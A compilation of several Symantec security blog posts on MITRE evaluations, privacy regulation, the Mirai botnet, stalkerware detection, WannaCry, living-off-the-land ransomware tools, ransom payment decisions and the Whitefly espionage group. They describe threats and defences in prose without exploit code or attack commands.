text
stringlengths 0
383k
|
---|
What the MITRE 2023 Test Results Mean
Join SANS webinar to discuss how to apply the results
It’s complicated. MITRE Engenuity ATT&CK® Evaluations are difficult to understand. The latest release is no different. The MITRE 2023 results performed analysis on multiple vendors’ defenses against the behavior of the Turla adversary in two well thought-out and well executed attacks against a mythical company. What these results reveal, by design, is not winners and losers. What they reveal should be determined by your specific security role.
Your perspective is critical in evaluating product performance. For example, if you’re an Admin who is actively trying to deal with an attack, you may not be concerned with which API the threat used to launch a file. However, if you’re the Forensic analyst, and you want to identify a specific threat actor, the technique used to launch a file - particularly if it is novel - might be immensely important.
It’s complicated. But not impossible. And we can help you determine what’s important to you and how to practically assess how well a product answers your needs. Please join us for What the MITRE 2023 Test Means for You, a webinar hosted by SANS Analyst Matt Bromiley, 1 pm EDT, 10 am PDT, on Sept. 28, 2023.
|
What the New NIST Privacy Framework Means to You
Big news is coming when NIST takes the wraps off a new privacy framework
Thanks to the General Data Privacy Regulation (GDPR) of the European Union, which took full effect in May 2018, privacy is at center stage worldwide. Penalties are being meted out for violations, and organizations of all kinds need to understand and comply with the law. In addition, the California Consumer Privacy Act (CCPA) was enacted in June 2018, with many other states working on similar bills.
The rash of laws is in response to the very real threats to privacy that are endemic to the digital age in which we live. But there is good news. The National Institute of Standards and Technology (NIST) is on the case, facilitating the creation of a Privacy Framework, along the lines of its highly acclaimed Cyber Security Framework. Work began in October 2018 and version 1.0 is due in October 2019 following a public comment period that is soon to begin.
As with the Cyber Security Framework, NIST is playing the role of facilitator for public and private companies and other organizations to meet, discuss, and decide what should be in, and not in, the framework. I am honored to be participating in the process as Symantec’s representative. When NIST asks for input, I work with the Symantec team to submit a response.
Progress update
At the heart of the privacy discussion is data. To safeguard privacy, you need to understand what data you have, where it’s located and how it’s classified. If it’s personally-identifiable information (PII), you need to know whether it’s relevant to GDPR or CCPA or another privacy regulation such as HIPAA in healthcare and FERPA in the academic world. Like the Cyber Security Framework, the Privacy Framework identifies four key activities regarding risks: identify, assess, manage, and communicate.
A major point of debate is whether to integrate the Privacy Framework with the Cyber Security Framework, either completely, partially, or not at all. This discussion is proceeding along two proposed paths: Integrated Core vs. Separated Core. NIST is looking for feedback for which core participants prefer. My view is that it should be more integrated, rather than less.
Although security and privacy are not identical, they are closely related. The saying goes, “You can have security without privacy, but you can’t have privacy without security.” Security is fundamental to protecting an organization’s privacy or the privacy rights of the data subject.
Data protection, fundamental to security, is also fundamental to privacy. If you can see who is interacting with what data and what they are doing with it, you can assert control. For example, when a spreadsheet containing PII is sent as an email attachment, it can be automatically blocked.
To safeguard privacy, you need to understand what data you have, where it’s located and how it’s classified.
Protection against ransomware, a key goal of a cyber security plan, is also highly relevant to privacy. For example, if a piece of ransomware should take data, rather than just encrypt it, a privacy compromise will have occurred.
A challenging topic on the agenda is the impact of AI and machine learning (ML) on privacy. For example, data analytic inputs can betray bias in such processes as facial recognition. Biased ML actions in turn could result in the incorrect classification of data or the release of PII about a data subject.
The Privacy Framework, like the Cyber Security Framework, will be written in language that is understandable by a wide range of readers, not just technology experts. And it will be flexible enough to be tailored to the different sizes and missions of a variety of organizations. Organizational leaders are responsible to determine how to implement the Privacy Framework based on risk tolerance and what makes sense for their organizations. And keep in mind when organizations implement the framework, they don’t automatically achieve compliance with GDPR, CCPR or other regulations. The Privacy Framework will be a key tool, but compliance itself remains the responsibility the organizations themselves.
There is no doubt NIST’s role of facilitator is no easy task. But NIST is doing a great job, demonstrating the skills they so ably developed in the creation of the Cyber Security Framework. The stakes are high. Privacy, we all agree, is essential. But I am confident the NIST Privacy Framework will get the job done, for businesses, governments, and most important, people.
|
What to do when Botnets Go Berserk
The threat posed by large-scale botnet assaults opens a new chapter in enterprise security
A killer botnet commandeers a zombie network of unsecured, everyday devices to bring the Internet to its knees, zapping billions of dollars in commerce and causing disruption to services across the globe.
It might sound like a scene from a bad sci-fi movie, but it’s not. The real-life villain in this real-life story is the Mirai large-scale botnet, which preyed upon unsecured Internet of Things (IoT) devices to set off a massive DDoS assault in late 2016. Mirai ensnared Dyn, a company that controls much of the Internet’s domain name system (DNS) infrastructure, which in turn disrupted service on popular websites like Twitter, PayPal, and Netflix. The mastermind behind Mirai was not a shadowy nation-state or big-time hacker. In the case, culprits were three young computer geeks who stumbled into creating the most successful botnet to date as part of a scam to gain advantage in the world of Minecraft, a popular online computer game.
The high-profile attack is now in the rear-view mirror, but danger still abounds. With researchers predicting more than 8 billion IoT-connected “things”—a 31% spike over 2016 as we barrel towards 20.4 billion devices by 2020 - security experts are girding for the prospect of similar IoT-inspired malware mutants.
It’s difficult to establish exactly how many Mirai-infected devices are in the field, but there are some data points. As detailed in the 2017 Symantec Internet Security Threat Report (ISTR), Incapsula research found close to 50,000 unique IPs hosting Mirai-infected devices attempting to launch attacks on its network, and Level 3 identified 493,000 Mirai zombies on its network. Symantec launched its own honeypot to track attempted attacks on IoT devices. It found strikes had almost doubled, and at the peak of Mirai’s activity, attacks were coming every two minutes.
Mirai mostly targeted consumer IoT devices like unsecured household routers and DVRs along with CCTV cameras as part of its botnet brigade. But experts say this kind of threat vector may also have serious ramifications for the enterprise. Without proper security measures, companies could unknowingly get swept up in an Mirai-induced DDoS attack or risk having their own IoT assets, including industrial control systems, getting attacked.
“Most corporations are not prepared to survive DDoS attacks that come from small devices,” said Vijay Sarvepali, information security architect CERT Division, at Carnegie Mellon’s Software Engineering Institute. “Those that have done business resiliency planning properly will survive better than those that have not.”
Proactive Defense is the Best Defense
IoT devices are a prime target for botnet attacks like Mirai because unlike enterprise laptops or desktop computers, which are safeguarded with multiple levels of robust security, there is typically minimal protections on this gear--maybe a default user name and password, at best. This class of IoT devices is also unlikely to receive automatic updates, which leaves the door open to vulnerabilities that don’t get patched.
Infected IoT devices could potentially provide entrée to stealing personal data like user names and passwords or become a stepping stone to attacking other devices on a network. As part of a DDoS attempt on DNS providers like Dyn, the botnet gains access to a broad spectrum of corporate servers, increasing disruption and raising the stakes for its targets.
Enterprises are less likely to end up becoming an active participant in a Mirai-inspired IoT botnet and DDoS attack and more likely to end up on the receiving end, at risk for service disruptions, according to Candid Wueest, principal threat researcher at Symantec. If a botnet starts sending garbage data to a web site or ecommerce platform in droves, Wueest noted that the site can be quickly overwhelmed with requests and break down, unable to service customers and partners.
“Attackers don’t need to break into a company in terms of finding a password or unpatched system somewhere—they’ll masquerade as users to get in and take the service down so users can’t make use of it,” Wueest said, adding that the attack puts companies at risk for downtime, lost revenue, and even supply chain disruptions.
Planning for DDoS attacks in advance, not when an attack is underway, is the best line of defense. IT organizations need to beef up architecture resources and map out a robust resilency plan that includes locating servers in different data centers and data centers on different networks so there is no single point of failure, according to Rachel Kartch, analysis team lead at CMU’s SEI CERT Division.
In addition, organizations should have a response plan and recovery drill at the ready. Knowing who to call in the event of a problem is also important. “Have a black book you can follow—for example, limiting the amount of traffic in different countries, which might buy you time and help mitigate damage,” Wueest said.
There are also specialized outsourcing providers offering services that specialize in scaling infrastructure to respond to DDoD attacks. Many of these providers offer scrubbing or filtering services that function like a firewall, blocking problematic traffic before it hits the network.
Nevertheless, as with most security threats, there is no single, full-proof solution for protecting against this new strain of IoT botnets gone berserk. As Wueest notes: “taking a layered approach to security is always the best the defense.”
|
What We’re Doing to Fight the Scourge of Cyber Stalking
Here’s how we’re battling “creepware” to protect victims of stalking and intimate partner violence
It’s a sad fact of life that technology can be used to stalk, harass and harm people’s partners, acquaintances and even strangers. MIT Technology Review cites the domestic-violence charity Refuge as saying that approximately 95 percent of the cases it sees involve technology-based abuse of some kind.
Mobile devices are often the platform on which abusers deploy software we call “creepware” – apps that can be used to abuse, stalk, harass and spy on others, frequently to enable intimate partner violence. But it’s been very hard to detect creepware apps, in part because they often have less objectionable use cases, or at least pretend to, as in the case of an app that abruptly changed its name from “Girlfriend Cell Tracker” to “Family Locator for Android.”
A major challenge in detecting creepware is that apps that enable stalking and harassment are often careful about how they describe themselves.
Because of the seriousness of the problem, at Symantec we set out to how to detect creepware and protect victims and would-be victims from it. In concert with researchers at Cornell and New York University, we created CreepRank, which ranks the probability that any given app is used as creepware. We have incorporated CreepRank into Norton Mobile Security, which stops the covert surveillance apps it detects from being installed on people’s phones and warns of their presence if they are already there.
A major challenge in detecting creepware is that apps that enable stalking and harassment are often careful about how they describe themselves. While the occasional app does call itself “Girlfriend Tracker” or “Boyfriend Tracker,” apps are increasingly likely to choose strictly technical or innocuous-sounding names, even when designed for illegal uses. In addition, an overly prescriptive approach to discovering creepware would have limited the scope of our findings.
Types of Surveillance
We designed CreepRank for anonymized data about billions of app installations on 50 million mobile devices over years of data. We quickly discovered that people who install one abusive app are likely install many others as well. Latching onto this observation, we designed CreepRank around the insight expressed in the old Spanish proverb, “Tell me who your friends are and I’ll tell you who you are.” Accordingly, we applied CreepRank to millions of apps installed on 50 million phones, ranking each app according to its propensity to be installed alongside known abusive apps. The higher the CreepRank, the more likely the app is to be used for abusive purposes. A manual examination of the apps with the highest CreepRanks revealed well over 1000 apps used for a variety of malicious purposes.
The most common form of creepware, we found, are surveillance apps used to spy on others and track their locations, phone use, texts and more. They are often used for stalking and can lead to intimate partner violence. Some of the apps can spy on another person's texts by uploading them to the cloud, and then reading them. Some track people’s precise locations or use geofencing to alert a stalker that the victim has left the house. Some can read people’s call logs or record people’s calls and forward them to the harasser. Others can remotely turn on the microphone on a victim’s phone, record whatever is happening, and forward that to the stalker.
The most common form of creepware, we found, are surveillance apps used to spy on others and track their locations, phone use, texts and more.
Many of these surveillance apps are extremely troubling and are used to stalk, harass and commit violence. People who use them are very controlling and very abusive. They use the apps not just to track their victims, but also to isolate, intimidate and control them.
In a horrifying case, a Florida man killed his wife and two children several days after he installed surveillance software on his wife’s phone and used it to see her texts and photos she had been sharing, according to the New York Times. The man has been sentenced to three consecutive life terms.
Norton Mobile Security detects these types of surveillance apps and won’t let them be installed on a phone and will remove them if they’re already installed. You can see a screenshot, below. (For now, it’s available for Android devices, but we are working on incorporating it into our iOS app as well.) We have also worked with app stores to get surveillance apps removed so they’re not readily available.
Using CreepRank we have also identified other types of stalking, harassment and abusive apps, including “bombing” apps that let abusers send hundreds or thousands of text messages simultaneously to a victim, spoofing apps that hide the true phone number and identity of the harasser, apps that can be used to create fake suggestive images and harm a victim’s reputation, and other types of interpersonal attack apps. We are incorporating their CreepRank into Norton Mobile Security so they can be removed from victim’s phones, and have worked with app stores to get hundreds of abusive apps removed from distribution.
We’re working hard to take creepware out of the hands of abusers, and to give victims and potential victims the tools to protect themselves and be free of harassment, violence and attacks. As we do more, I’ll keep you informed, so check back here regularly.
|
What you need to know about the WannaCry Ransomware
The WannaCry ransomware struck across the globe in May 2017. Learn how this ransomware attack spread and how to protect your network from similar attacks.
UPDATE: May 23, 2017 00:30 GMT:
Symantec has uncovered further links to more closely tie the WannaCry attacks with the Lazarus group. For further details, see: WannaCry: Ransomware attacks show strong links to Lazarus group
UPDATE: May 15, 2017 23:24:21 GMT:
Symantec has uncovered two possible links that loosely tie the WannaCry ransomware attack and the Lazarus group:
Co-occurrence of known Lazarus tools and WannaCry ransomware: Symantec identified the presence of tools exclusively used by Lazarus on machines also infected with earlier versions of WannaCry. These earlier variants of WannaCry did not have the ability to spread via SMB. The Lazarus tools could potentially have been used as method of propagating WannaCry, but this is unconfirmed.
Shared code: As tweeted by Google’s Neel Mehta, there is some shared code between known Lazarus tools and the WannaCry ransomware. Symantec has determined that this shared code is a form of SSL. This SSL implementation uses a specific sequence of 75 ciphers which to date have only been seen across Lazarus tools (including Contopee and Brambul) and WannaCry variants.
While these findings do not indicate a definitive link between Lazarus and WannaCry, we believe that there are sufficient connections to warrant further investigation. We will continue to share further details of our research as it unfolds.
A virulent new strain of ransomware known as WannaCry (Ransom.Wannacry) has hit hundreds of thousands of computers worldwide since its emergence on Friday, May 12. WannaCry is far more dangerous than other common ransomware types because of its ability to spread itself across an organization’s network by exploiting critical vulnerabilities in Windows computers, which were patched by Microsoft in March 2017 (MS17-010). The exploit, known as “Eternal Blue,” was released online in April in the latest of a series of leaks by a group known as the Shadow Brokers, who claimed that it had stolen the data from the Equation cyber espionage group.
Am I protected from the WannaCry ransomware?
Symantec Endpoint Protection (SEP) and Norton have proactively blocked any attempt to exploit the vulnerabilities used by WannaCry, meaning customers were fully protected before WannaCry first appeared. SEP14 Advanced Machine Learning proactively blocked all WannaCry infections on day zero, without any updates.
The Blue Coat Global Intelligence Network (GIN) provides automatic detection to all enabled products for web-based infection attempts.
Symantec and Norton customers are automatically protected against WannaCry using a combination of technologies. Proactive protection was provided by:
IPS network-based protection
SONAR behavior detection technology
Advanced Machine Learning
Intelligent Threat Cloud
Customers should have these technologies enabled for full proactive protection. SEP customers are advised to migrate to SEP 14 to take advantage of the proactive protection provided by Advanced Machine Learning signatures.
What is the WannaCry ransomware?
WannaCry searches for and encrypts 176 different file types and appends .WCRY to the end of the file name. It asks users to pay a US$300 ransom in bitcoins. The ransom note indicates that the payment amount will be doubled after three days. If payment is not made after seven days it claims the encrypted files will be deleted. However Symantec has not found any code within the ransomware which would cause files to be deleted.
Can I recover the encrypted files or should I pay the ransom?
Decryption of encrypted files is not possible at present but Symantec researchers continue to investigate the possibility. See this article for further details. If you have backup copies of affected files, you may be able to restore them. Symantec does not recommend paying the ransom.
In some cases, files may be recovered without backups. Files saved on the Desktop, My Documents, or on a removable drive are encrypted and their original copies are wiped. These are not recoverable. Files stored elsewhere on a computer are encrypted and their original copies are simply deleted. This means they could be recovered using an undelete tool.
When did WannaCry appear and how quickly did it spread?
WannaCry first appeared on Friday, May 12. Symantec saw a dramatic upsurge in the number of attempts to exploit the Windows vulnerabilities used by WannaCry from approximately 8:00 GMT onwards. The number of exploit attempts blocked by Symantec dropped slightly on Saturday and Sunday but remained quite high. Exploit numbers increased on Monday, presumably as people returned to work after the weekend.
Figure 1. Number of exploit attempts blocked by Symantec of Windows vulnerability used by WannaCry per hour
Figure 2. Number of exploit attempts blocked by Symantec of Windows vulnerability used by WannaCry per day
Figure 3. Heatmap showing Symantec detections for WannaCry, May 11 to May 15
Who is impacted?
Any unpatched Windows computer is potentially susceptible to WannaCry. Organizations are particularly at risk because of its ability to spread across networks and a number of organizations globally have been affected, the majority of which are in Europe. However individuals can also be affected.
Is this a targeted attack?
Current WannaCry activity is not believed to be part of a targeted attack.
Why is it causing so many problems for organizations?
WannaCry has the ability to spread itself within corporate networks without user interaction, by exploiting known vulnerabilities in Microsoft Windows. Computers that do not have the latest Windows security updates applied are at risk of infection.
How is WannaCry spread?
While WannaCry can spread itself across an organization’s networks by exploiting a vulnerability, the initial means of infection—how the first computer in an organization is infected—remains unconfirmed. Symantec has seen some cases of WannaCry being hosted on malicious websites, but these appear to be copycat attacks, unrelated to the original attacks.
How does the ransom payment work?
The WannaCry attackers request that the ransom be paid using Bitcoins. WannacCy generates a unique Bitcoin wallet address for each infected computer, however due to a race condition bug this code does not execute correctly. WannaCry then defaults to three hardcoded Bitcoin addresses for payment. The attackers are unable to identify which victims have paid using the hardcoded addresses, meaning that victims are unlikely to get their files decrypted.
The WannaCry attackers subsequently released a new version of the malware that corrected this flaw, however this version was not as successful as the original.
On May 18, a new notice was displayed on infected computers informing victims that files will be decrypted if the ransom is paid.
What are the details on Symantec's protection?
Network-based protection
Symantec has the following IPS protection in place to block attempts to exploit the MS17-010 vulnerability:
OS Attack: Microsoft SMB MS17-010 Disclosure Attempt (released May 2, 2017)
Attack: Shellcode Download Activity (released April 24, 2017)
SONAR behavior detection technology
SONAR.AM.E.!g18
SONAR.AM.E!g11
SONAR.Cryptlk!g1
SONAR.Cryptlocker!g59
SONAR.Cryptlocker!g60
SONAR.Cryptlocker!g80
SONAR.Heuristic.159
SONAR.Heur.Dropper
SONAR.Heur.RGC!g151
SONAR.Heur.RGC.CM!g13
SONAR.Heuristic.158
SONAR.Heuristic.161
SONAR.SuspDataRun
SONAR.SuspLaunch!g11
SONAR.SuspLaunch!gen4
SONAR.TCP!gen1
Advanced Machine Learning
Heur.AdvML.A
Heur.AdvML.B
Heur.AdvML.D
Antivirus
For expanded protection and identification purposes, the following Antivirus signatures have been updated:
Ransom.Wannacry
Ransom.CryptXXX
Trojan.Gen.8!Cloud
Trojan.Gen.2
Ransom.Wannacry!gen1
Ransom.Wannacry!gen2
Ransom.Wannacry!gen3
Customers should run LiveUpdate and verify that they have the following definition versions or later installed in order to ensure they have the most up-to-date protection:
20170512.009
The following IPS signature also blocks activity related to Ransom.Wannacry:
System Infected: Ransom.Ransom32 Activity
Organizations should also ensure that they have the latest Windows security updates installed, in particular MS17-010 to prevent spreading.
What are best practices for protecting against ransomware?
New ransomware variants appear on a regular basis. Always keep your security software up to date to protect yourself against them.
Keep your operating system and other software updated. Software updates will frequently include patches for newly discovered security vulnerabilities that could be exploited by ransomware attackers.
Email is one of the main infection methods. Be wary of unexpected emails especially if they contain links and/or attachments.
Be extremely wary of any Microsoft Office email attachment that advises you to enable macros to view its content. Unless you are absolutely sure that this is a genuine email from a trusted source, do not enable macros and instead immediately delete the email.
Backing up important data is the single most effective way of combating ransomware infection. Attackers have leverage over their victims by encrypting valuable files and leaving them inaccessible. If the victim has backup copies, they can restore their files once the infection has been cleaned up. However organizations should ensure that backups are appropriately protected or stored off-line so that attackers can’t delete them.
Using cloud services could help mitigate ransomware infection, since many retain previous versions of files, allowing you to roll back to the unencrypted form.
|
What’s Fueling the Ransomware Epidemic?
Symantec shines a light
Less than two months into 2024, we have seen an explosion of dual-use tools exploited in ransomware attacks. Dual-use tools are legitimate software tools created to perform specific business and IT functions, but, instead, are installed and employed by attackers to help commit ransomware attacks. While most active ransomware groups have exploited some dual-use tools in the past, the sheer number of tools being used now has grown exponentially.
This rapid expansion of dual-use tools in ransomware attacks underscores the role that legitimate software abuse plays in fueling the ransomware epidemic. As we revealed in our recent report, “2024 Ransomware Threat Landscape,” attackers are increasingly using legitimate software, also known as “Living Off the Land (LOTL)” software throughout ransomware attacks to purposely minimize their dependence on malware. In fact, the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the United Kingdom National Cyber Security Center (NSC-UK) now have joined together to help defenders better identify and protect against these attacks with the publication of a new report, “Identifying and Mitigating Living Off the Land Techniques.”
In another white paper, “Advances in Endpoint Security,” Dave Gruber, Principal Analyst Enterprise Strategy Group (ESG) writes, “More than half of security leaders (52%) reported to ESG that security operations are more challenging than they were two years ago, fueled by a growing and changing attack surface alongside a rapidly changing threat landscape. This includes an increased use of LOTL tools.”
And the risks posed by LOTL and dual-use tools extend far beyond ransomware. As CISA, the FBI, NCSC and the NSA recently revealed, nation-state actors often use these techniques to evade detection. For example, BlackTech actors use living off the land TTPs to blend in with normal operating system and network activities, allowing them to evade detection by endpoint detection and response (EDR) products.
LOTL vs. Dual-Use Tool-Based Attacks
The majority of LOTL tools are legitimate software already installed on a device and often a component of Windows such as PowerShell, WMI and Vssadmin. Based on our analysis, most ransomware groups have predefined methods to use these LOTL tools in their arsenal. In contrast, dual-use tools are widely used legitimate software packages that are often introduced by attackers onto targeted networks. Remote desktop/remote administration software is the most commonly abused dual use category, employed to control endpoints in place of deploying malware. In fact, the LockBit ransomware group recently made news when it took advantage of remote monitoring and management software to spread its foothold in targeted networks.
Other popular dual-use tools that we have observed in ransomware attacks include:
PsExec: Microsoft Sysinternals tool for executing processes on other systems. The tool is primarily used by attackers to move laterally on victim networks.
NetScan: SoftPerfect Network Scanner (netscan.exe), a publicly available tool used for discovery of host names and network services.
AdFind: A publicly available tool that is used to query Active Directory. It has legitimate uses, but is widely used by attackers to help map a network.
Rclone: Open-source tool that can legitimately be used to migrate content to the cloud, but has been abused by ransomware actors to exfiltrate data from victim machines.
AnyDesk: A legitimate remote desktop application, which recently suffered its own hack. AnyDesk and similar tools are often used by attackers to obtain remote access to computers on a network.
In their recent report, CISA accurately sums up the many security challenges defenders are facing when trying to prevent stealth attackers from abusing known “good” tools. “There is a general lack of conventional indicators of compromise (IOCs) associated with LOTL activity, complicating network defenders’ efforts to identify, track, and categorize malicious behavior.” Traditional security methods are not effective in protecting enterprises from this risk.
Protecting against the malicious use of legitimate tools that are critical to an organization is a tough problem. Is there an easy solution? We will address this in our next blog.
|
When it Comes to Ransomware Demands, Just say No
While some targets have paid to get back their data, experts say most victims continue to reject extortion demands
When Dave Richards learned cyber hackers had locked down 23 of his municipal servers in West Haven, Connecticut on October 16, he quickly notified his bosses in the mayor’s office and took the usual steps of calling in state and local police and the Department of Homeland Security.
The criminals, who were operating from overseas, were demanding a ransom to restore the city’s access to what the city deemed “critical” networks. Richards, the city’s information technology manager, along with Mayor Nancy Rossi, and local police IT experts, agreed that the best course of action was to pay the hackers a $2,000 ransom in bitcoin to unlock the servers.
Three weeks later, Richards is still cleaning up the malware mess. “We’ve got the FBI and the DHS in here still finding things,” he said. “It’s an ongoing investigation. We’re still rebuilding.”
Security experts and law enforcement agencies have a rule when ransomware hackers try to extort money from companies, municipalities, utilities, hospitals, or individuals: Don’t pay.
“First of all, that money is then used to proliferate this activity,” says Joel DeCapua, the supervisory special agent for the FBI’s cyber crimes division. “You’re paying these bad actors to target other people. Second, organizations that pay a ransom think their problems are over. But a lot of times there’s a lot of nasty malware left on their systems that they don’t know about. You can pay, but there’s still malware on there, re-infecting the system or stealing information.”
In 2017, the FBI received 1,783 complaints of ransomware attacks. That figure belies the overall problem and most likely reflects only the organizations (like hospitals) required by law to report such incursions. Actual ransomware detections stood at 1,242 per day that year, according to Symantec. In the complaints filed with the FBI, victims reported $2.3 million in total losses. That figure, says the FBI, could include not only ransoms paid, but remediation and downtime costs.
Security experts and law enforcement agencies have a rule when ransomware hackers try to extort money from companies, municipalities, utilities, hospitals, or individuals: Don’t pay.
Again, that’s only the figure officially reported to authorities. Neither the FBI nor industry experts keep a tally on how many victims pay versus those who don’t. However, DeCapua says that through the FBI’s relationships with IT security firms sent in to mop up after an attack, “we hear anecdotally that too many victims elect to just pay the ransom and hope for the best.”
The decision to pay comes down to a couple of key issues: One is whether the victim has sufficiently backed up their system and their files and, more crucially, whether they’ve run tests to determine that those backups will work when they need them. (Organizations often fail to do this because testing requires downtime and that hurts the bottom-line productivity.
The second issue is arguably more pressing: financial calculation. System downtime is costly. So are idled workers. And so is brute-force rebuilding from backups. It’s far more expedient, especially if your backups are out of date, to pony up. “For their own wallet, companies and cities will decide to pay,” says Kevin Haley, director of product management for Symantec Security Response. “It’s a phenomenal cost for some victims to recover their files. It shouldn’t be a mystery to anyone if they haven’t figured out how to recover from a crisis like this.”
Those concerns weighed on West Haven’s pay-the-hackers decision. Though the city didn’t originally want to offer up the money, officials looked at other municipalities that hadn’t paid ransomware hackers and didn’t like the price tags they saw.
For example, this past March, ransomware attackers hit the city of Atlanta with the SamSam encryption virus, crippling the city’s computer systems and demanding a ransom. West Haven officials clearly had that experience in mind and apparently, when it chose to hand over $2,000 to hackers. “Atlanta didn’t pay” when it was attacked, West Haven’s Corporation Counsel Lee Tiernan explained to the New Haven Register shortly after the pay off. “They [the hackers] wanted $57,000.”
But “$3 million later, they’re still trying to clean it up.” In fact, Atlanta, which had been criticized prior to the attack for not upgrading its IT infrastructure, could end up paying as much $17 million in contracts and costs associated with the attack, according the Atlanta-Journal Constitution.
Don’t Bet on Good Intentions of Cyber Criminals
Despite the associated costs of re-building from backups, the FBI and security industry analysts say the trend is toward not giving in to extortion demands.
“More and more people are not paying,” said Symantec’s Kevin Haley.
In fact, just three days before the West Haven attack, hackers deploying the malware EMOTET launched a virus known as RYUK against the Onslow Water and Sewer in North Carolina. Instead of paying the ransom demands, the utility set about rebuilding their system from backups. Their reasoning, said utility officials in a statement: Any ransom monies “would be used to fund criminal, and perhaps terrorist activities in other countries. Furthermore, there is no expectation that payment of a ransom would forestall repeat attacks. ONWASA will not negotiate with criminals nor bow to their demands.”
Even if they had paid a ransom, as did West Haven, DeCapua says there’s never a guarantee a victim will get their files restored, and that is perhaps the biggest reason not to do business with hackers.
“These guys are criminals,” he says. “You can’t rely on them to just keep their promise. And a lot of them are not technically sophisticated. They just don’t know how their virus is going to affect different operating systems. We’ve seen instances where victim pays the ransom but because of the hackers’ incompetence they’ve not able to decrypt the computer.”
|
Where Does Privacy Regulation Go From Here?
Improved data protection and increased transparency are trending around the globe
Last month I wrote about the privacy wins and unanticipated challenges resulting from the European Union’s General Data Protection Regulation (GDPR), which took effect on May 25. The GDPR has led to an unprecedented level of transparency and awareness and has affected countless individuals and businesses across the globe.
The question currently on everyone’s mind: What do these impacts mean for privacy regulation in the future? Speaking as the Director of Symantec’s GDPR Strategy: embrace ‘GDPR-level privacy’ because chances are we will see more of it in more places around the globe. Here’s why:
GDPR as de facto Standard
Given the sheer size of the European digital market and the extraterritorial scope of the GDPR, the GDPR is likely to successfully spread its principles and stringent requirements to other regions.
The European Union is resolutely pursuing its efforts to export its model through the so-called adequacy principle, whereby non-European countries who want to do data business with Europe are incentivized to import European grade privacy protection into their national laws.
While this trend intensifies, with countries like Japan, South Korea and India contemplating the benefits of GDPR adequacy, European regulators are pushing further ahead: The next generation of privacy regulation for electronic communications, also known as ePrivacy, is already in the works. The ambition is clear: build on the GDPR baseline to further increase privacy protections for the Internet of Everything era.
APJ Focuses on Mandatory Reporting
Data protection law continues to develop swiftly in other regions as well, with notable developments in the Asia-Pacific region. In Australia, the Privacy Amendment (Notifiable Data Breaches) Act 2016 came into effect this February, establishing mandatory reporting obligations for any organization that suffers an eligible data breach. Companies operating in Singapore are also preparing for the likely adoption of a mandatory breach notification law and for a possible new Data Protection Trustmark certification.
California Passes First U.S. Consumer Privacy Law
California’s governor signed the California Consumer Privacy Act of 2018 into law last month. This law is considered the strongest, most aggressive privacy protection measure in the U.S. and takes effect on January 1, 2020. Similar to the GDPR, it requires that companies tell Californians what information they are collecting, such as name, IP address, email address, postal address, etc., as well as how that information is being used. Sherrie Osborne, Symantec’s Director of US Privacy, will provide more information on this development in an upcoming blog post.
Privacy regulation will continue to evolve and Symantec will continue to play an integral role in making the world a better and safer place. We’ll stay as focused as we have been on advocating in favor of privacy and security in public policy making, upholding our own privacy compliance efforts accordingly, and striving for privacy excellence in the products and services we create.
Our most crucial objectives will be to stay focused on preserving our users’ and business partners’ trust by helping our customers and users protect their privacy and their data as best possible.
If you found this information useful, you may also enjoy:
California Consumer Privacy Act of 2018
|
Whitefly: Espionage Group has Singapore in Its Sights
Group behind the SingHealth breach is also responsible for a string of other attacks in the region.
In July 2018, an attack on Singapore’s largest public health organization, SingHealth, resulted in a reported 1.5 million patient records being stolen. Until now, nothing was known about who was responsible for this attack. Symantec researchers have discovered that this attack group, which we call Whitefly, has been operating since at least 2017, has targeted organizations based mostly in Singapore across a wide variety of sectors, and is primarily interested in stealing large amounts of sensitive information.
Whitefly compromises its victims using custom malware alongside open-source hacking tools and living off the land tactics, such as malicious PowerShell scripts.
"#Whitefly, the group behind the SingHealth breach, is also responsible for a string of other attacks in Singapore https://symc.ly/2X1RALf"
CLICK TO TWEET
Whitefly’s targets
From mid-2017 to mid-2018, Whitefly launched targeted attacks against multiple organizations. While most of these organizations were based in Singapore, some were multinational organizations with a presence in Singapore.
To date, Whitefly has attacked organizations in the healthcare, media, telecommunications, and engineering sectors.
How Whitefly compromises its victims
Whitefly first infects its victims using a dropper in the form of a malicious .exe or .dll file that is disguised as a document or image. These files frequently purport to offer information on job openings or appear to be documents sent from another organization operating in the same industry as the victim. Given the nature of disguise, it’s highly likely that they are sent to the victim using spear-phishing emails.
If opened, the dropper runs a loader known as Trojan.Vcrodat on the computer. Whitefly has consistently used a technique known as search order hijacking to run Vcrodat. This technique takes advantage of the fact that Windows does not require an application to provide a specific path for a DLL that it wishes to load. If no path is provided, Windows searches for the DLL in specific locations on the computer in a pre-defined order. Attackers can therefore give a malicious DLL the same name as a legitimate DLL but place it ahead of the legitimate version in the search order so that it will be loaded when Windows searches for it. Whitefly frequently delivers Vcrodat as a malicious DLL that has the same name as DLLs belonging to legitimate software from various security vendors. The group leverages search order hijacking to assure that its malicious DLLs will be executed. Targeting security applications could allow the attackers to gain higher privileges for the malware, since the vendor’s component may be run with elevated privileges.
Once executed, Vcrodat loads an encrypted payload on to the victim’s computer. The payload contacts a command and control (C&C) domain. Whitefly configures multiple C&C domains for each target. The payload sends system information about the infected computer to the C&C server and downloads additional tools.
Whitefly usually attempts to remain within a targeted organization for long periods of time—often months—in order to steal large volumes of information.
Once the initial computer on the targeted organization’s network is infected with Vcrodat, Whitefly begins mapping the network and infecting further computers. In order to carry out this operation, it uses publicly available tools, including Mimikatz (Hacktool.Mimikatz) and an open-source tool (SHA2: 263dc5a8121d20403beeeea452b6f33d51d41c6842d9d19919def1f1cb13226c) that exploits a known Windows privilege escalation vulnerability (CVE-2016-0051) on unpatched computers. The attackers rely heavily on tools such as Mimikatz to obtain credentials. Using these credentials, the attackers are able to compromise more machines on the network and, from those machines, again obtain more credentials. They perform this tactic repeatedly until they gain access to the desired data.
Whitefly usually attempts to remain within a targeted organization for long periods of time—often months—in order to steal large volumes of information. It keeps the compromise alive by deploying a number of tools that facilitate communication between the attackers and infected computers. These tools include a simple remote shell tool that will call back to the C&C server and wait for commands, and an open-source hacking tool called Termite (Hacktool.Rootkit), which allows Whitefly to perform more complex actions such as controlling multiple compromised machines at a time.
Additional malware used in selected attacks
In some attacks, Whitefly has used a second piece of custom malware, Trojan.Nibatad. Like Vcrodat, Nibatad is also a loader that leverages search order hijacking, and downloads an encrypted payload to the infected computer. And similar to Vcrodat, the Nibatad payload is designed to facilitate information theft from an infected computer.
